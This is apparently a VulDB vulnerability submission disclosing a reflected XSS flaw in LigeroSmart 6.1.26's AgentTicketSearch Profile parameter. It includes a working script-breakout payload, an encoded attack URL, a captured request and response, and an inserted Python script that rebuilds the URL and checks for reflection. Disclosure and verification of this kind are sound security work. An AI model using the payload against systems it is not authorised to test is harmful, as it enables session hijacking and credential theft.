Submission #749758: LigeroSmart 6.1.26 Cross-Site Scripting (XSS) - Reflected XSS
Information

Title: LigeroSmart 6.1.26 Cross-Site Scripting (XSS) - Reflected XSS
Description: A reflected Cross-Site Scripting (XSS) vulnerability was identified in LigeroSmart version 6.1.26. Testing was performed against the Docker installation from https://github.com/LigeroSmart/docker-ligerosmart. The issue occurs due to insufficient input sanitization of the Profile parameter in the AgentTicketSearch functionality. An authenticated attacker can inject arbitrary JavaScript code, which is reflected back to the user's browser and executed in the context of the application. This may allow session hijacking, credential theft, unauthorized actions on behalf of authenticated users, and other client-side attacks.

Affected Endpoint: /otrs/index.pl
Vulnerable Parameter: Profile=<user-controlled input>

Proof of Concept (PoC): </script><script>alert(7777)</script>

URL-Encoded Payload:
http://localhost:9090/otrs/index.pl?Action=AgentTicketSearch;Subaction=Search;TakeLastSearch=1;SaveProfile=1;Profile=1%3C%2Fscript%3E%3Cscript%3Ealert%287777%29%3C%2Fscript%3E

When the crafted URL is opened by an authenticated agent user, the injected JavaScript payload is executed in the browser and displays an alert dialog (alert(7777)), confirming the reflected XSS vulnerability. Note that the payload opens with a closing </script> tag, which indicates the Profile value is reflected inside an inline script block rather than into plain HTML text.
REQUEST

GET /otrs/index.pl?Action=AgentTicketSearch;Subaction=Search;TakeLastSearch=1;SaveProfile=1;Profile=1%3C%2Fscript%3E%3Cscript%3Ealert%287777%29%3C%2Fscript%3E HTTP/1.1
Host: localhost:9090
Cache-Control: max-age=0
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Referer: http://burpsuite/
Accept-Encoding: gzip, deflate, br
Cookie: OTRSAgentInterface=mGvYIUIyihthTyFtxMhNihGuC3BGLRnw
Connection: keep-alive

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Disposition: filename="AgentTicketSearch.html"
Content-Type: text/html; charset=utf-8;
Date: Sat, 31 Jan 2026 12:32:51 GMT
Expires: Tue, 1 Jan 1980 12:00:00 GMT
Pragma: no-cache
Server: nginx
X-Frame-Options: SAMEORIGIN
X-Ua-Compatible: IE=edge,chrome=1
Content-Length: 51479

<!DOCTYPE html>
<html>
<!-- -->
<!-- OTRS: Copyright (C) 2001-2020 OTRS AG, https://otrs.com/.
--> <!-- Web: https://otrs.com/ - Lists: https://lists.otrs.org/ --> <!-- GNU General Public License: https://www.gnu.org/licenses/gpl-3.0.txt --> <!-- --> <head> <meta http-equiv="Content-type" content="text/html;charset=utf-8" /> <meta id="viewport" name="viewport" content=""> <meta name="robots" content="noindex,nofollow" /> <script> (function(doc, win) { var viewport = doc.getElementById('viewport'), isIFrame = (win.top.location.href !== win.location.href), isPopup = (win.name.search(/^OTRSPopup_/) != -1); try { if (((!isIFrame && !isPopup) || (isIFrame && isPopup)) && (!localStorage.getItem("DesktopMode") || parseInt(localStorage.getItem("DesktopMode"), 10) <= 0)) { viewport.setAttribute("content", "width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"); } } catch (Exception) {} }(document, window)); </script> <link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (Ticket#)" href="/otrs/index.pl?Action=AgentTicketSearch;Subaction=OpenSearchDescriptionTicketNumber" /> <link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (Texto Completo)" href="/otrs/index.pl?Action=AgentTicketSearch;Subaction=OpenSearchDescriptionFulltext" /> <link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (FAQ#)" href="/otrs/index.pl?Action=AgentFAQSearch;Subaction=OpenSearchDescriptionFAQNumber" /> <link rel="search" type="application/opensearchdescription+xml" title="LigeroSmart (FAQ-TextoCompleto)" href="/otrs/index.pl?Action=AgentFAQSearch;Subaction=OpenSearchDescriptionFulltext" /> <link rel="shortcut icon" href="/otrs-web/skins/Agent/ligero/img/icons/product.ico" type="image/ico" /> <link rel="apple-touch-icon" href="/otrs-web/skins/Agent/ligero/img/icons/apple-touch-icon.png" /> <link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css-cache/CommonCSS_58d99bf049eab644adf1f2f6d94d8555.css" /> <link rel="stylesheet" type="text/css" 
href="/otrs-web/skins/Agent/ligero/css-cache/CommonCSS_9ccfdcfb580d3c1055590bb9f234fef7.css" /> <link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css-cache/ModuleCSS_32ff7fb570c153262e7a390c9d7f8324.css" /> <link rel="stylesheet" type="text/css" href="/otrs-web/skins/Agent/default/css/thirdparty/ui-theme/jquery-ui.css" /> <style type="text/css"> #Header #Logo { background-image: url(/otrs-web/skins/Agent/default/img/logo_bg.png); top: 7px; right: 24px; width: 300px; height: 55px; } </style> <link rel="stylesheet" type="text/css" href="/otrs-web/common/css/font-awesome.min.css" /> <script> (function(doc, win) { var isIFrame = (win.top.location.href !== win.location.href), isPopup = (win.name.search(/^OTRSPopup_/) != -1); try { if (((!isIFrame && !isPopup) || (isIFrame && isPopup)) && (!localStorage.getItem("DesktopMode") || parseInt(localStorage.getItem("DesktopMode"), 10) <= 0)) { var ResponsiveCSS; ResponsiveCSS = doc.createElement("link"); ResponsiveCSS.setAttribute("rel", "stylesheet"); ResponsiveCSS.setAttribute("type", "text/css"); ResponsiveCSS.setAttribute("href", "/otrs-web/skins/Agent/default/css-cache/ResponsiveCSS_342832cd0dfa4f871e6b8d41435252e0.css"); doc.getElementsByTagName("head")[0].appendChild(ResponsiveCSS); } } catch (Exception) {} }(document, window)); </script> <title>Procurar - Chamado - LigeroSmart</title> <script type="text/javascript">//<![CDATA[ "use strict"; var Core = Core || {}; Core.App = Core.App || {}; /** * @function * Ignores an event. Implemented without jQuery because no external JavaScript is available yet. * @return nothing */ function IgnoreEvent (Event) { if (Event.preventDefault) { Event.preventDefault(); } Event.returnValue = false; return false; } /** * @function * This function blocks all click events on the page until it is * unblocked after all JavaScript was loaded. Implemented without * jQuery because no external JavaScript is available yet. 
* @return nothing */ Core.App.BlockEvents = function() { if (document.addEventListener) { document.addEventListener('click', IgnoreEvent, false); } else { document.attachEvent('onclick', IgnoreEvent); } }; /** * @function * This function unblocks all click events on the page * after all JavaScript was loaded. Implemented without * jQuery because no external JavaScript is available yet. * @return nothing */ Core.App.UnblockEvents = function() { if (document.removeEventListener) { document.removeEventListener('click', IgnoreEvent, false); } else { document.detachEvent('onclick', IgnoreEvent); } // allow tests to wait for complete page load Core.App.PageLoadComplete = true; }; // Now block all click events on the page to make sure that // an agent does not click before all JavaScript was loaded, // as event listeners are not yet available, for example. Core.App.BlockEvents(); //]]></script> </head> <body class=""> <a name="Top"></a> <div id="AppWrapper"> <div id="Header" class="ARIARoleBanner"> <div id="Logo"></div> <ul id="ToolBar"> <li class="UserAvatar"> <a href="#"> <img src="//www.gravatar.com/avatar/b1a4b2518dbbdd47dd4a713d5cd1df94?s=100&d=mp" /> </a> <div> <span>Admin LigeroSmart</span> <a href="/otrs/index.pl?Action=AgentPreferences" title="Editar preferências pessoais"> <i class="fa fa-cog"></i><strong>Preferências Pessoais</strong> </a> <a class="LogoutButton" id="LogoutButton" href="/otrs/index.pl?Action=Logout;ChallengeToken=UFfwuDve1AuIS2ehbEmyWw4pZ2qVcCeE;" title="Sair (Você está logado como Admin LigeroSmart)"> <i class="fa fa-power-off"></i><strong>Sair</strong> </a> </div> </li> <li class="QueueView"><a href="/otrs/index.pl?Action=AgentTicketQueue" target="" accesskey="q" title="Visão de Filas: (q)">Visão de Filas <i class="icon-small fa fa-clock-o icon-show-reached"></i> <i class="icon-small fa fa-star icon-show-new"></i><i class="fa fa-folder"></i> <span class="Counter"></span> </a></li> <li class="QueueView"><a 
href="/otrs/index.pl?Action=AgentTicketQueueKanban" target="" accesskey="q" title="Kanban view: (q)">Kanban view <i class="ic
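The response excerpt above is cut off before the point where the Profile value would be reflected, so the submission's evidence for the reflection is the alert dialog rather than the response body. The following script is an added example, not code from the submission or from the LigeroSmart project: it rebuilds the PoC URL exactly as given (OTRS-derived applications accept ';' as the query separator, which the submission's URL relies on), and it classifies a response body as reflecting the payload raw, reflecting it only as HTML entities, or not reflecting it at all. The last case matters because an expired OTRSAgentInterface session returns a login page with HTTP 200, which an "alert did not fire" check would misread as "not vulnerable". The sample bodies are constructed for illustration; the cookie name and the live-check helper are the only parts that touch the real application, and they are assumptions about a deployment you control.

```python
"""Rebuild and verify the LigeroSmart AgentTicketSearch Profile reflection.

Added example; not part of the VulDB submission or the LigeroSmart code base.
"""
import urllib.request
from html import escape
from urllib.parse import quote

# Payload from the submission. The leading </script> only makes sense if the
# Profile value is echoed inside an inline <script> block: closing that block
# lets the attacker's own <script> element be parsed and executed.
PAYLOAD = "</script><script>alert(7777)</script>"
BASE_URL = "http://localhost:9090/otrs/index.pl"


def build_poc_url(base_url=BASE_URL, payload=PAYLOAD, prefix="1"):
    """Reproduce the submission's URL.

    OTRS and its derivatives split the query string on ';' as well as '&';
    the Profile value is percent-encoded in full (safe='' also encodes '/').
    """
    params = [
        ("Action", "AgentTicketSearch"),
        ("Subaction", "Search"),
        ("TakeLastSearch", "1"),
        ("SaveProfile", "1"),
        ("Profile", prefix + payload),
    ]
    return base_url + "?" + ";".join(f"{k}={quote(v, safe='')}" for k, v in params)


def reflection_verdict(body, payload=PAYLOAD):
    """Classify how a response body reflects the payload.

    'raw'     - payload appears verbatim: the reflection is unsanitized
    'encoded' - payload appears only as HTML entities (&lt;, &gt;)
    'absent'  - not reflected at all: login page, error page or a different
                code path; the test is inconclusive, not a clean result
    """
    if payload in body:
        return "raw"
    if escape(payload) in body:
        return "encoded"
    return "absent"


def check_live(url, session_cookie, timeout=10):
    """Fetch url with an agent session and classify the body.

    Assumes the cookie name OTRSAgentInterface seen in the submission's request.
    Requires network access to a LigeroSmart instance you are allowed to test;
    it is not exercised by the offline samples below.
    """
    req = urllib.request.Request(
        url, headers={"Cookie": f"OTRSAgentInterface={session_cookie}"}
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return reflection_verdict(body)


# Constructed sample bodies (not captured from LigeroSmart), one per verdict.
VULNERABLE_BODY = '<script>var SearchProfile = "1' + PAYLOAD + '";</script>'
SANITIZED_BODY = '<input type="hidden" name="Profile" value="1' + escape(PAYLOAD) + '">'
LOGIN_BODY = '<form action="/otrs/index.pl"><input name="User"><input name="Password"></form>'


if __name__ == "__main__":
    print(build_poc_url())
    for name, body in [
        ("vulnerable", VULNERABLE_BODY),
        ("sanitized", SANITIZED_BODY),
        ("login-page", LOGIN_BODY),
    ]:
        print(f"{name}: {reflection_verdict(body)}")
```

An 'encoded' verdict means the application entity-encoded the value somewhere in the page; because the injection context here is a script block, a fix should encode the value for JavaScript string context (or emit it as JSON) rather than rely on HTML entity encoding alone, and the check should be repeated against the exact reflection point once the full response body is available.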
Source: https://github.com/LigeroSmart/ligerosmart/issues/282
User: Samara Gama - igobysamy (UID 81801)
Submission: 31.01.2026 14:08 (3 months ago)
Moderation: 15.02.2026 17:00 (15 days later)
Status: accepted
VulDB Entry: 346154 [LigeroSmart up to 6.1.26 index.pl?Action=AgentTicketSearch Profile cross site scripting]
Points: 20
